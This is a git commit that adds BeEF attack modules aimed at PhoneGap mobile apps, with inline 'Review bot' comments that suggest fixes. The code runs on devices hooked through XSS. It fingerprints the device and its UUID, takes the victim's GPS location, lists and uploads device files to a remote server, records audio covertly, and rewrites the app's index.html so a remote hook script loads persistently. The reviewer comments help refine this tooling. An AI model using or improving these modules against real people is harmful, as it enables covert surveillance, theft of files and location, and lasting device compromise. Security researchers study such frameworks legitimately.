renamed phonegap modules dir

Mike Haworth
2011-12-21 21:19:58 +13:00
parent e694e5a019
commit d2b69738b7
26 changed files with 549 additions and 1 deletions

Submodule modules/phonegap deleted from 083a15556a

6
modules/phonegap_/README Normal file

@@ -0,0 +1,6 @@
== BeEF Modules for PhoneGap applications ==
1. Get XSS
2. Install BeEF from beefproject
3. Copy this directoy into module directory
4. Profit


@@ -0,0 +1,7 @@
//
// make the phone beep
//
beef.execute(function() {
navigator.notification.beep(1);
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'Beeped');
});


@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
Beep:
enable: true
category: "Phonegap"
name: "Beep"
description: "Make the phone beep"
authors: ["mh"]
target:
working: ["All"]


@@ -0,0 +1,12 @@
# phonegap
#
class Beep < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end
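Review bot: `post_execute` reads `@datastore['result']`, but the Beep command script in this commit sends the bare string 'Beeped' with no `result=` prefix, so the saved `content['result']` is presumably empty. That assumes the framework fills the datastore from `key=value` pairs, as the `'result='+result` form used by the other scripts suggests. Making the sender and the reader agree on one key, for example sending `'result=Beeped'`, keeps the command log meaningful. Start_record_audio's script likewise sends an unkeyed string; there `post_execute` reads `file_name`, which may come from the option rather than from the reply.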


@@ -0,0 +1,12 @@
//
// exploit phonegap
//
beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>,
'phonegap_version='+" name: " + device.name
+ " phonegap api: " + device.phonegap
+ " platform: " + device.platform
+ " uuid: " + device.uuid
+ " version: " + device.version);
});


@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
Detect:
enable: true
category: "Phonegap"
name: "Detect phonegap"
description: "Detects if phonegap api is present"
authors: ["mh"]
target:
working: ["All"]
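Review bot: The `description` says only that the module detects the PhoneGap API, while the Detect command script in this commit also reports the device name, platform, OS version and `device.uuid`. A persistent device identifier ends up in the stored command results, so the operator should be told that before running it. I would change the line to `description: "Detects the phonegap api and reports device name, platform, version and UUID"`.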


@@ -0,0 +1,12 @@
# phonegap
#
class Detect < BeEF::Core::Command
def post_execute
content = {}
content['phonegap_version'] = @datastore['phonegap_version']
save content
end
end


@@ -0,0 +1,44 @@
//
// phonegap_upload
//
beef.execute(function() {
var result = 'unchanged';
// TODO return result to beef
function win(r) {
//alert(r.response);
result = 'success';
}
// TODO return result to beef
function fail(error) {
//alert('error! errocode =' + error.code);
result = 'fail';
}
// (ab)use phonegap api to upload file
function beef_upload(file_path, upload_url) {
var options = new FileUploadOptions();
options.fileKey="content";
// grab filename from the filepath
re = new RegExp("([^/]*)$");
options.fileName = file_path.match(re)[0];
//options.fileName="myrecording.wav";// TODO grab from filepath
// needed?
var params = new Object();
params.value1 = "test";
params.value2 = "param";
options.params = params;
// needed?
var ft = new FileTransfer();
ft.upload(file_path, upload_url, win, fail, options);
}
beef_upload('<%== @file_upload_src %>', '<%== @file_upload_dst %>');
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); // move this to inside beef_upload
});


@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
File_upload:
enable: true
category: "Phonegap"
name: "Upload file"
description: "Upload files from device to server of your choice"
authors: ["mh"]
target:
working: ["All"]


@@ -0,0 +1,28 @@
# phonegap
#
class File_upload < BeEF::Core::Command
def self.options
return [{
'name' => 'file_upload_dst',
'description' => 'Upload a file from device to your server',
'ui_label'=>'detination',
'value' => 'http://192.168.9.130/recv-unauth.php',
'width' => '300px'
},{
'name' => 'file_upload_src',
'description' => 'path to file on device',
'ui_label'=>'file path',
'value' => '/sdcard/myrecording.wav',
'width' => '300px'
}]
end
def callback
content = {}
content['Result'] = @datastore['result']
save content
end
end
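Review bot: The default `'value'` for `file_upload_dst` is a fixed private address, `http://192.168.9.130/recv-unauth.php`, which looks like a leftover from the author's lab. With that default, a run with untouched options sends device files over plain HTTP to whatever host holds that address on the local network. An empty default, `'value' => ''`, forces the destination to be set deliberately for each engagement. The label on the same option is misspelled and should read `'ui_label'=>'destination'`. This class and List_files define `callback` and store under `'Result'`, while the other modules in the commit use `post_execute` and `'result'`; which hook the framework invokes is not visible here, so the naming is worth aligning.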


@@ -0,0 +1,30 @@
//
// geo locate
//
beef.execute(function() {
var onSuccess = function(position) {
result =
'Latitude: ' + position.coords.latitude + '\n' +
'Longitude: ' + position.coords.longitude + '\n' +
'Altitude: ' + position.coords.altitude + '\n' +
'Accuracy: ' + position.coords.accuracy + '\n' +
'Altitude Accuracy: ' + position.coords.altitudeAccuracy + '\n' +
'Heading: ' + position.coords.heading + '\n' +
'Speed: ' + position.coords.speed + '\n' +
'Timestamp: ' + new Date(position.timestamp) + '\n' ;
map = 'Map url: http://maps.google.com/?ll='+
position.coords.latitude + ',' + position.coords.longitude;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result+map );
};
// onError Callback receives a PositionError object
//
function onError(error) {
console.log('code: ' + error.code + '\n' +
'message: ' + error.message + '\n');
}
navigator.geolocation.getCurrentPosition(onSuccess, onError);
});
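Review bot: `result` and `map` in `onSuccess` are assigned without `var`, so they become globals on the hooked page. The map link is also built with `http://`, which puts the coordinates in a cleartext URL when the operator opens it. I would declare both locally and switch the scheme: `var result = ...` and `var map = 'Map url: https://maps.google.com/?ll=' + ...`. `onError` only writes to the device console, so a denied or failed lookup leaves no entry in the command results.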


@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
Geo_locate:
enable: true
category: "Phonegap"
name: "Geo locate"
description: "Geo locate your victim"
authors: ["mh"]
target:
working: ["All"]


@@ -0,0 +1,12 @@
# phonegap
#
class Geo_locate < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end


@@ -0,0 +1,36 @@
//
// phonegap_upload
//
beef.execute(function() {
var directory = "<%== @directory %>";
var result = '';
function fail() {
result = 'fail';
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
}
function success(entries) {
var i;
for (i=0; i<entries.length; i++) {
result = result + '\n ' + entries[i].name;
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
}
// use directoryentry to create directory reader
function gotDirEntry(dirEntry) {
var directoryReader = dirEntry.createReader();
directoryReader.readEntries(success,fail);
}
// use getDirectoy to create reference to directoryentry
function gotFS(fileSystem) {
fileSystem.root.getDirectory(directory, null, gotDirEntry, fail);
}
window.requestFileSystem(LocalFileSystem.PERSISTENT, 0, gotFS, fail);
});
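Review bot: The header comment reads `// phonegap_upload`, copied from the upload script, although this file lists directory entries; it should say so, e.g. `// list files in a directory`. The comment above `gotFS` also misspells `getDirectory` as `getDirectoy`. The `directory` option is placed raw inside a double-quoted literal through `<%== @directory %>`, so a value containing a quote or backslash would produce a broken script unless the framework escapes it elsewhere, which is not visible here.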


@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
List_files:
enable: true
category: "Phonegap"
name: "List files"
description: "Examine device file system"
authors: ["mh"]
target:
working: ["All"]


@@ -0,0 +1,22 @@
# phonegap
#
class List_files < BeEF::Core::Command
def self.options
return [{
'name' => 'directory',
'description' => 'List files in this directory',
'ui_label'=>'Directory',
'value' => '/',
'width' => '300px'
}]
end
def callback
content = {}
content['Result'] = @datastore['result']
save content
end
end


@@ -0,0 +1,137 @@
//
// persistence
//
beef.execute(function() {
// insert hook into index.html
//
// 1. locate index.html
// 2. read it in
// 3. add our hook
// 4. write it back out to same location
// 1. locate index.html
//
// list dirs under current dir
// one should be something.app
// inside that should be a www dir and in that an index.html
//
// write the file with new hook
function write_file(text) {
function fail () {
console.log('write_file fail')
}
function gotFileWriter(writer) {
writer.onwrite = function(evt) {
console.log("write success");
}
writer.write(text);
}
function gotFileEntry(fileEntry) {
fileEntry.createWriter(gotFileWriter, fail);
}
function gotFS(fileSystem) {
fileSystem.root.getFile("../"+window.tmpfilename+"/www/index.html", null, gotFileEntry, fail);
}
window.requestFileSystem(LocalFileSystem.PERSISTENT, 0, gotFS, fail);
}
// find <head></head> and insert our hook.
function replace_text(text) {
re = new RegExp("<head>", "g");
hook_url = '<%== @hook_url %>';
new_text = text.replace(re, "<head><script src='" + hook_url + "'></script>")
write_file(new_text);
}
function read_index(app_name) {
function fail () {
console.log('read_index fail')
}
function readFile(file) {
var reader = new FileReader();
reader.onloadend = function(evt) {
//console.log("Read as text");
console.log(evt.target.result);
replace_text(evt.target.result);
};
reader.readAsText(file);
}
function gotFileEntry(fileEntry) {
fileEntry.file(readFile, fail);
}
function gotFS(fileSystem) {
fileSystem.root.getFile("../"+app_name+"/www/index.html", null, gotFileEntry, fail);
}
window.requestFileSystem(LocalFileSystem.PERSISTENT, 0, gotFS, fail);
}
function locate() {
function result(entries) {
console.log('result');
var i;
for (i=0; i<entries.length; i++) {
// looking for <something>.app
var re = new RegExp(/^[a-zA-Z0-9]*\.app/)
var match = re.exec(entries[i].name)
if (match) {
console.log('found ' + entries[i].name);
// look for ../<something>.app/www/index.html
read_index(entries[i].name);
// FIXME find a less hacky way
// just wanted to make this global so I didnt have to call it again to write the file
window.tmpfilename = entries[i].name;
}
}
}
function fail() {
console.log('fail');
}
function win(entries) {
console.log('win');
result(entries);
}
// use directoryentry to create directory reader
function gotDirEntry(dirEntry) {
var directoryReader = dirEntry.createReader();
directoryReader.readEntries(win,fail);
}
// use getDirectoy to create reference to directoryentry
function gotFS(fileSystem) {
// on iphone current dir defaults to <myname>.app/documents
// so we wanna look in our parent directory for <something>.app
fileSystem.root.getDirectory('../', null, gotDirEntry, fail);
}
window.requestFileSystem(LocalFileSystem.PERSISTENT, 0, gotFS, fail);
}
//result = fail;
//beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);
locate();
result = 'success';
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);
});
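Review bot: The final `beef.net.send(..., 'result='+result)` runs as soon as `locate()` returns, before any of the asynchronous file-system callbacks have fired, and every `fail` handler only calls `console.log`. The command log therefore records 'success' whether or not index.html was changed. Because this module rewrites a file on the device, that log is what cleanup after a test relies on, and it should not claim more than it knows. At minimum add a comment above the send: `// sent before the async file operations complete; does not confirm that index.html was modified`. `re`, `hook_url`, `new_text` and `result` are also assigned without `var`, and `console.log(evt.target.result)` dumps the whole page source to the device console.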


@@ -0,0 +1,12 @@
# phonegap persistence
#
beef:
module:
Persistence:
enable: true
category: "Phonegap"
name: "Persistence"
description: "Insert the beef hook into phonegap's index.html (iphone only)"
authors: ["mh"]
target:
working: ["All"]
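Review bot: `description` says the module is iphone only, yet `working: ["All"]` advertises it for every target, and nothing tells the operator that it overwrites the application's index.html on the device. The target list should be narrowed to match the description. The text should also state the side effect, e.g. `description: "Insert the beef hook into phonegap's index.html (iphone only; rewrites the app's file on disk)"`.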


@@ -0,0 +1,22 @@
# phonegap persistenece
#
class Persistence < BeEF::Core::Command
def self.options
return [{
'name' => 'hook_url',
'description' => 'The URL of your beef hook',
'ui_label'=>'Hook URL',
'value' => 'http://beef:3000/hook.js',
'width' => '300px'
}]
end
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end


@@ -0,0 +1,24 @@
//
// exploit phonegap
//
beef.execute(function() {
// TODO detect iphone/android and set this accordingly
var file_uri = "<%== @file_name %>";
m = new Media(file_uri);
m.startRecord();
// weirdly setTimeout and stopRecord don't seem to work together
//milliseconds = "<%== @duration %>" * 1000;
//setTimeout("m.stopRecord()", milliseconds);
// so here is an ugly work around
//start = new Date();
//stop = start.getTime() + 5000;
//do {
// current = new Date();
// current = current.getTime();
//} while(current < stop)
//m.stopRecord();
beef.net.send("<%= @command_url %>", <%= @command_id %>, "started recording");
});
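Review bot: `m = new Media(file_uri)` creates an undeclared global that the Stop record audio script depends on (`m.stopRecord()`), and nothing in either file documents that coupling. A comment such as `// m is left global on purpose: the Stop record audio module calls m.stopRecord()` would make it explicit. The commented-out timer block is duplicated verbatim in both scripts and refers to `@duration`, which is not among the options defined in Start_record_audio's module.rb; it can be deleted from both.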


@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
Start_record_audio:
enable: true
category: "Phonegap"
name: "Start record audio"
description: "Start Record audio"
authors: ["mh"]
target:
working: ["All"]


@@ -0,0 +1,22 @@
# phonegap
#
class Start_record_audio < BeEF::Core::Command
def self.options
return [
{'name' => 'file_name',
'description' => 'File name for audio recording',
'ui_label' => 'file name',
'value' => 'myrecording.wav'
}
]
end
def post_execute
content = {}
content['file_name'] = @datastore['file_name']
save content
end
end


@@ -0,0 +1,20 @@
//
// exploit phonegap
//
beef.execute(function() {
m.stopRecord();
// weirdly setTimeout and stopRecord don't seem to work together
//milliseconds = "<%== @duration %>" * 1000;
//setTimeout("m.stopRecord()", milliseconds);
// so here is an ugly work around
//start = new Date();
//stop = start.getTime() + 5000;
//do {
// current = new Date();
// current = current.getTime();
//} while(current < stop)
//m.stopRecord();
beef.net.send("<%= @command_url %>", <%= @command_id %>, "finished recording");
});


@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
Stop_record_audio:
enable: true
category: "Phonegap"
name: "Stop record audio"
description: "Stop Record audio"
authors: ["mh"]
target:
working: ["All"]


@@ -0,0 +1,7 @@
# phonegap
#
class Stop_record_audio < BeEF::Core::Command
end